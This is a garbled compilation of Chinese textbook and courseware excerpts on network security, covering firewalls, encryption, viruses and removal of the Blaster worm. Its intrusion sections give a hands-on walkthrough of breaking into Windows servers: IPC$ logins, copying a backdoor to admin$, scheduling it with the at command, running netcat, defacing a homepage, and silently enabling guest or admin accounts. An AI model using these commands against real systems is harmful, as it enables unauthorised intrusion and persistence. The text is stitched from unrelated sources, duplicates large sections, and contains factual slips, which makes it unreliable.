ISO 将计算机安全定义为:为数据处理系统建立和采取的技术与管 理方面的安全保护,保护计算机软件数据、硬件不因偶然和恶意的原 因而遭到破坏、更改及泄露。
➢ 软件的漏洞或“后门”
➢ 企业网络内部
返回本节首页 返回本章首页
9.2 防火墙技术
9.2.1 防火墙的基本概念
1. 什么是防火墙
“防火墙”(Fire Wall)是用来连接两个网络并控制两个网络之间相 互访问的系统,如图9-1所示。它包括用于网络连接的软件和硬件以及控 制访问的方案。防火墙用于对进出的所有数据进行分析,并对用户进行 认证,从而防止有害信息进入受保护网,为网络提供安全保障。
为了在对称加密过程中有效地管理好密钥,保证数据的机密性,美 国麻省理工学院提出了一种基于可信赖的第三方的认证系统—— Kerberos。它是一种在开放式网络环境下进行身份认证的方法,使网 络上的用户可以相互证明自己的身份。
Kerberos采用对称密钥体制对信息进行加密。其基本思想是:能正 确对信息进行解密的用户就是合法用户。用户在对应用服务器进行访 问之前,必须先从第三方(Kerberos服务器)获取该应用服务器的访 问许可证(ticket)。
链路加密简单、容易实现,但由于全部报文都以明文形式通过各结点, 因此在这些结点上,数据容易受到非法存取的危险,而且每条链路都需 要一对加、解密设备和一个独立密钥,因此成本较高。
(2)结点加密
结点加密是对链路加密的改进,它也要为通信链路上传输的所有数据 进行加密,而且加密过程对用户是透明的。
教材-第9章-常用工具软件介绍-大学计算机基础(第5版)-翟萍-清华大学出版社
12
第9章 常用工具软件介绍
主要介绍
9.1 计算机病毒 9.2 系统备份 9.3 压缩及解压缩 9.4 PDF文档
2
9.1 计算机病毒防治
1.定义 计算机病毒(Computer Virus)是编制者在计算机程序中插入 的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制 的一组计算机指令或者程序代码。 2.特征
WinRAR是当前最流行的压缩工具,其压缩文件格式为RAR, 完全兼容ZIP压缩文件格式,压缩比例比ZIP文件要高出30%左 右,同时可解压CAB、ARJ、LZH、TAR、GZ、ACE、UUE、B22、 JAR、ISO等多种类型的压缩文件。WinRAR的功能包括强力压 缩、分卷、加PDF文件阅读工具Adobe Reader
PDF(Portable Document Format,便携式文档格式或可移 植文档格式)是Adobe公司制定的一种适于在不同计算机平 台之间传送和共享文件的开放式电子文件格式。该格式的文 件可以包含图形、声音等多媒体信息,可以建立主题间的跳 转、注释,而且无论在何种机器、何种操作系统上都能以制 作者所希望的形式显示和打印出来。
Symantec Ghost是备份系统常用的工具。它可以把一个磁 盘上的全部内容复制到另外一个磁盘上,也可以把磁盘内容 复制为一个磁盘的镜像文件,以后可以用镜像文件创建一个 原始磁盘的备份。它可以最大限度地减少安装操作系统的时 间,并且多台配置相似的计算机可以共用一个镜像文件。
1.备份
2.还原
9.3 文件压缩备份工具WinRAR
繁殖性。破坏性。传染性。潜伏性。隐蔽性。 可触发性。
3.分类 根据破坏程度划分。良性病毒、恶性病毒、极恶性病毒、灾难性病毒。 根据连接方式划分。源码型病毒、操作系统型病毒、外壳型病毒 根据算法划分:伴随型病毒。“蠕虫”型病毒。
第9章网络安全
公用钥匙
加密
!@#$~%^~&~*()-
私有钥匙
解密
This is a book
缺点:利用公用钥匙加密虽然可避免钥匙共享而带来 的问题,但其使用时,需要的计算量较大。
9.3 数据完整性验证与数字签名
9.3.1 Hash函数
Hash函数又名信息摘要(message digest)函 数,可将一任意长度的信息浓缩为较短的固定长度 的数据。其特点是:
9.3.3 数字签名
利用钥匙加密验证值可防止信息遭篡改。进一步 地,采用公用钥匙算法中的私有钥匙加密验证值, 则除了可防止信息遭篡改外,该加密值也同时是数 字签名。
如下页图9-3-1所示为甲和乙之间进行数字签名的 生成和确认流程。
从图中可看出,数字签名的功能有三:可证明信 件的来源;可判定信件内容是否被篡改;发信者无 法否认曾经发过信。
9.2.1 加密与解密
图9-2-1示意了加密、解密的过程。其中,“This is a book”称为明文(plaintext或cleartext);“!@# $~%^ ~ & ~ *()-”称为密文(ciphertext)。将明文转换成密文 的过程称为加密(encryption),相反的过程则称为解 密(decryption)。
第9章 网络安全
本章学习目标
本章主要讲述与网络安全有关的背景知识 和防范措。通过本章学习,应掌握以下内容 : l 网络安全隐患 l 加密技术基本知识 l 身份认证技术 l 网络安全标准、措施和有关法规
第9章 网络安全
9.1 网络安全隐患 9.2 数据加密 9.3 数据完整性验证与数字签名 9.4 网上身份认证常识 9.5 防火墙技术
秘密钥匙
!@#$~%^~&~*()-
9 计算机网络安全-计算机网络原理及应用-王辉-清华大学出版社
Chp9 计算机网络安全
计算机网络原理及应用
3、计算机网络病毒
(1)计算机网络病毒的特点
• 入侵计算机网络的病毒形式多样 • 不需要寄主 • 电子邮件成为新的载体 • 利用操作系统安全漏洞主动攻击
Chp9 计算机网络安全
计算机网络原理及应用
(2)计算机网络病毒的传播方式
通常把病毒入侵途径划分为两大类: • 传统方式:通过软盘、硬盘、CD-ROM及局
计算机病毒有很多种定义,从广义上讲, 凡是能引起计算机故障,破坏计算机中数据 的程序统称为计算机病毒。现今国外流行的 定义为:计算机病毒是一段附着在其他程序 上的、可以实现自我繁殖的程序代码。
Chp9 计算机网络安全
计算机网络原理及应用
(2)计算机病毒的分类
• 按传染方式分类 可分为三种类型,分别是引导型、文件型和
• 按攻击对象划分 可分为三种类型,攻击DOS的病毒、攻击
Windows的病毒、攻击网络的病毒。
Chp9 计算机网络安全
计算机网络原理及应用
2、计算机病毒的特征
• 传染性:是指病毒具有把自身复制到其他程序 中的特性。
• 潜伏性:是指病毒具有依附其他媒体而寄生 的能力,也称隐蔽性。
• 破坏性:是指病毒破坏文件或数据,甚至损坏 主板,干扰系统的正常运行。
混合型病毒。
• 按寄生方式分类 可分为四种类型,分别是代替型、链接型、
转储型和源码病毒。
Chp9 计算机网络安全
计算机网络原理及应用
• 按危害程度分类 严格地说,只要是计算机病毒,就会对系统造
成一定的危害性,只是不同的计算机病毒造成的 危害程度不同。可分为三种类型,分别为良性病 毒、恶性病毒和中性病毒。
Chp9 计算机网络安全
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
3、瑞星防火墙设置举例: 下载瑞星防火墙软件演示:
4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。
9.20 VPN虚拟专用网
服务,操作步骤如下:
上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录
Copy c:\srv.exe \\IP地址\admin$
9.11 网络入侵实例解析
获取进程,键入如下命令: Net time \\IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe ,键入 At \\ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:\winnt\system32\目录下,这是黑客入侵的全过程
9.3 计算机病毒的防范
1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒
3、使用瑞星杀毒软件清除病毒。
4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: ①病毒名称:Worm.Blaser 发作时间:随机
9.5、清除冲击波病毒实例
3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: /downloads/details.aspx?familyI D=c8b8a846-f541-4c15-8c9f22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01
9.6、黑客入侵解析
黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。
黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。
9.7、 黑客入侵解析
4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FTP和GUEST帐户。
9.8、网络入侵实例解析
1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示:
扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use \\IP地址\IPC$ “密码“ /user: “用户名”
9.10、网络入侵实例解析
连接成功后,可以更换对方Web主页,键入如下: Copy c:\index.htm \\IP地址\C$\inetpub\wwwroot 其中C$\inetpub\wwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet
9.13 网络入侵的常用命令
Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。 AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time \\127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1,
⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 ⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性
9.22 网络安全体系结构
认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 ①User/Password 认证:常用于操作系统登录\telnet ,此认证方式不加 密,容易被监听和解密。 ②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议) SNMP Security protocol等均使用共享的Security Key,加上摘要算法. ③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。 应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁 重的证书管理任务。 ④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发 送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计 算机能力上讲是不可行的。
9.17 黑客防范技术
1、通常使用的安全控制手段有 ①包过滤、 ②状态检测 ③代理服务。 代理服务是运行于内部网络和外部网络之间的主机
之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。
计算机维护技术
第9章、计算机病毒与黑客防范
9.1 计算机病毒解析
1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。
2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。
这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒
9.2 计算机病毒
4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 ①内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DOS操作系统管不了,病毒修改内存空间大 小标记单位[0413]单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 ②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 ③文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 ④启动程序被修改。
1、VPN虚拟专用网组建 2、VPN示意图
பைடு நூலகம்
9.21 网络安全体系结构
网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段:
①防病毒软件
②防火墙 ③入侵检测
④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。
9.14 网络入侵的常用命令
启动一个程序,键入at \\127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp 将本机c:\index.htm 文件传送到对方d:\下 Put c:\index.htm d:\ 将对方d:\index.htm 文件传送到本机c:\下 Get d:\index.htm c:\
9.12、网络入侵的常用命令
Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use \\127.0.0.1\ipc$ “123456” /user: “abc” 退出 Net use \\127.0.0.1\ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。
如何探测电子邮件:电子邮件系统一般建立在网络服
务器上,如电子邮件地址xxx@表示该电 子邮件存储在网站上,其域名为 探测
①打开软件-----选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”
②病毒类型:蠕虫病毒
传播途径:网络/RPC漏洞
病毒尺寸:6176字节
③依赖系统:Windows2000/XP
④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有
9.4、清除冲击波病毒实例
漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找msblast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。
9.18 黑客防范技术
2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。
4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。
9.20 VPN虚拟专用网
服务,操作步骤如下:
上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录
Copy c:\srv.exe \\IP地址\admin$
9.11 网络入侵实例解析
获取进程,键入如下命令: Net time \\IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe ,键入 At \\ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:\winnt\system32\目录下,这是黑客入侵的全过程
9.3 计算机病毒的防范
1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒
3、使用瑞星杀毒软件清除病毒。
4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: ①病毒名称:Worm.Blaser 发作时间:随机
9.5、清除冲击波病毒实例
3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: /downloads/details.aspx?familyI D=c8b8a846-f541-4c15-8c9f22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01
9.6、黑客入侵解析
黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。
黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。
9.7、 黑客入侵解析
4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FTP和GUEST帐户。
9.8、网络入侵实例解析
1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示:
扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use \\IP地址\IPC$ “密码“ /user: “用户名”
9.10、网络入侵实例解析
连接成功后,可以更换对方Web主页,键入如下: Copy c:\index.htm \\IP地址\C$\inetpub\wwwroot 其中C$\inetpub\wwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet
9.13 网络入侵的常用命令
Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。 AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time \\127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1,
⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 ⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性
9.22 网络安全体系结构
认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 ①User/Password 认证:常用于操作系统登录\telnet ,此认证方式不加 密,容易被监听和解密。 ②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议) SNMP Security protocol等均使用共享的Security Key,加上摘要算法. ③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。 应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁 重的证书管理任务。 ④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发 送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计 算机能力上讲是不可行的。
9.17 黑客防范技术
1、通常使用的安全控制手段有 ①包过滤、 ②状态检测 ③代理服务。 代理服务是运行于内部网络和外部网络之间的主机
之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。
计算机维护技术
第9章、计算机病毒与黑客防范
9.1 计算机病毒解析
1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。
2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。
这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒
9.2 计算机病毒
4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 ①内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DOS操作系统管不了,病毒修改内存空间大 小标记单位[0413]单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 ②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 ③文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 ④启动程序被修改。
1、VPN虚拟专用网组建 2、VPN示意图
பைடு நூலகம்
9.21 网络安全体系结构
网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段:
①防病毒软件
②防火墙 ③入侵检测
④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。
9.14 网络入侵的常用命令
启动一个程序,键入at \\127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp 将本机c:\index.htm 文件传送到对方d:\下 Put c:\index.htm d:\ 将对方d:\index.htm 文件传送到本机c:\下 Get d:\index.htm c:\
9.12、网络入侵的常用命令
Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use \\127.0.0.1\ipc$ “123456” /user: “abc” 退出 Net use \\127.0.0.1\ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。
如何探测电子邮件:电子邮件系统一般建立在网络服
务器上,如电子邮件地址xxx@表示该电 子邮件存储在网站上,其域名为 探测
①打开软件-----选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”
②病毒类型:蠕虫病毒
传播途径:网络/RPC漏洞
病毒尺寸:6176字节
③依赖系统:Windows2000/XP
④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有
9.4、清除冲击波病毒实例
漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找msblast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。
9.18 黑客防范技术
2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。